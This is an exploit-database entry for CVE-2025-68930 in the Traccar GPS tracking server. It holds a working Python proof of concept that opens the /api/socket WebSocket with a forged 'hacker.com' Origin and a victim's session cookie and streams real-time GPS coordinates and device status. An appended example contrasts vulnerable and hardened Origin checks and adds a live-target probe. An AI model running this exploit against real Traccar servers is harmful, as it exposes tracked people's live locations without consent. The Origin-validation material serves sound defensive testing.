
Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)

Author: hazar
type: webapps
platform: multiple
port: 
date_added: 2026-05-04 
date_updated: 2026-05-04 
verified: 0 
codes: CVE-2025-68930 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930

"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket).
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header
along with a victim's valid JSESSIONID. This allows the attacker to hijack the
WebSocket connection and leak real-time sensitive data, including GPS coordinates
and device status.

Requirements:
pip install websocket-client
"""

import websocket
import argparse
import sys

def on_message(ws, message):
    print(f"[+] DATA LEAKED: {message}")

def on_error(ws, error):
    print(f"[-] Error: {error}")

def on_close(ws, close_status_code, close_msg):
    print("[-] Connection closed.")

def on_open(ws):
    print("[*] WebSocket Handshake Successful!")
    print("[*] Connection upgraded. Streaming real-time sensitive data...\n")

def main():
    parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
    parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
    parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
    parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")

    args = parser.parse_args()

    # Construct the WebSocket URL
    url = f"ws://{args.target}:{args.port}/api/socket"

    # Handshake headers that reproduce a cross-site browser request.
    # 'Origin' imitates a page on an attacker-controlled site; a server that validates
    # Origin would answer 403 instead of 101. The Cookie header stands in for what the
    # victim's browser would attach automatically.
    headers = [
        "Origin: http://hacker.com",
        f"Cookie: JSESSIONID={args.cookie}"
    ]

    print(f"""
    ================================================
    TRACCAR GPS TRACKER - CSWSH EXPLOIT
    Exploit Author: Hazar Taspinar
    CVE: CVE-2025-68930
    Target: {url}
    ================================================
    """)

    # Initiate WebSocket connection
    ws = websocket.WebSocketApp(url,
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close,
                                on_open=on_open,
                                header=headers)

    try:
        ws.run_forever()
    except KeyboardInterrupt:
        print("\n[*] Exploit stopped by user.")
        sys.exit(0)

if __name__ == "__main__":
    main()
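The following is an added example and is not part of the original advisory nor Traccar's own code. It models the handshake decision the PoC above exercises: a pure-Python handshake handler that, with no allowlist, upgrades any Origin (the vulnerable behaviour) and, with an allowlist, refuses foreign Origins while still accepting non-browser clients that send none (the hardened behaviour). It also includes a raw-socket probe that sends the same crafted handshake to a live target and reports the HTTP status. Hostnames such as tracker.example and hacker.example, the function names, and the allowlist policy are assumptions made for this example.

```python
# Added example, not from the Traccar project: vulnerable vs. hardened WebSocket
# handshake handling, plus a raw-socket probe for a live target.
import base64
import hashlib
import socket
from urllib.parse import urlsplit

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # RFC 6455 handshake GUID


def build_handshake(host, path, origin=None, cookie=None,
                    key="dGhlIHNhbXBsZSBub25jZQ=="):
    """Build the HTTP/1.1 Upgrade request a browser (or websocket-client) sends.
    The default key is the RFC 6455 sample nonce, so the expected accept value is known."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
    ]
    if origin is not None:
        lines.append(f"Origin: {origin}")
    if cookie is not None:
        lines.append(f"Cookie: {cookie}")
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_headers(raw):
    """Split a raw HTTP request/response into (start_line, {lowercase name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *rest = head.split("\r\n")
    headers = {}
    for line in rest:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers


def origin_allowed(origin, allowed_origins):
    """The server-side check the advisory says Traccar <= 6.11.1 lacks (policy is an assumption).
    No Origin header: non-browser client, cannot be driven by a web page, so it passes.
    Origin present: must be a well-formed http(s) origin that matches the allowlist exactly."""
    if origin is None:
        return True
    parts = urlsplit(origin)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False  # "null", opaque or garbage origins are rejected
    allowed = {o.lower().rstrip("/") for o in allowed_origins}
    return origin.lower().rstrip("/") in allowed


def handshake_response(raw_request, allowed_origins=None):
    """Return (status_code, response_text) for a handshake request.
    allowed_origins=None models the vulnerable server: every Origin gets upgraded."""
    _, h = parse_headers(raw_request)
    if h.get("upgrade", "").lower() != "websocket" or "sec-websocket-key" not in h:
        return 400, "HTTP/1.1 400 Bad Request\r\n\r\n"
    if allowed_origins is not None and not origin_allowed(h.get("origin"), allowed_origins):
        return 403, "HTTP/1.1 403 Forbidden\r\n\r\n"
    digest = hashlib.sha1((h["sec-websocket-key"] + WS_GUID).encode()).digest()
    accept = base64.b64encode(digest).decode()
    return 101, ("HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\n"
                 "Connection: Upgrade\r\nSec-WebSocket-Accept: " + accept + "\r\n\r\n")


def probe(host, port, cookie, origin="http://hacker.example", path="/api/socket", timeout=5):
    """Send the crafted handshake to a live target and return the HTTP status code.
    A 101 with a foreign Origin means the server does not validate Origin."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        request = build_handshake(f"{host}:{port}", path, origin, f"JSESSIONID={cookie}")
        s.sendall(request.encode())
        start, _ = parse_headers(s.recv(4096).decode(errors="replace"))
    return int(start.split()[1])


if __name__ == "__main__":
    # Constructed requests: same session cookie, foreign vs. legitimate Origin.
    evil = build_handshake("tracker.example:8082", "/api/socket",
                           "http://hacker.example", "JSESSIONID=node0abc")
    good = build_handshake("tracker.example:8082", "/api/socket",
                           "http://tracker.example:8082", "JSESSIONID=node0abc")
    print("vulnerable, foreign Origin:", handshake_response(evil)[0])
    print("hardened,   foreign Origin:", handshake_response(evil, ["http://tracker.example:8082"])[0])
    print("hardened,   own Origin:    ", handshake_response(good, ["http://tracker.example:8082"])[0])
```

To test a deployment, call `probe(host, port, cookie)` with a session cookie from your own test account: a 101 means the foreign Origin was accepted and the PoC above will stream data; a 403 means the server validates Origin. Exact-match origins (scheme, host and port) are used deliberately; suffix or substring matching is a common way to reintroduce the bug.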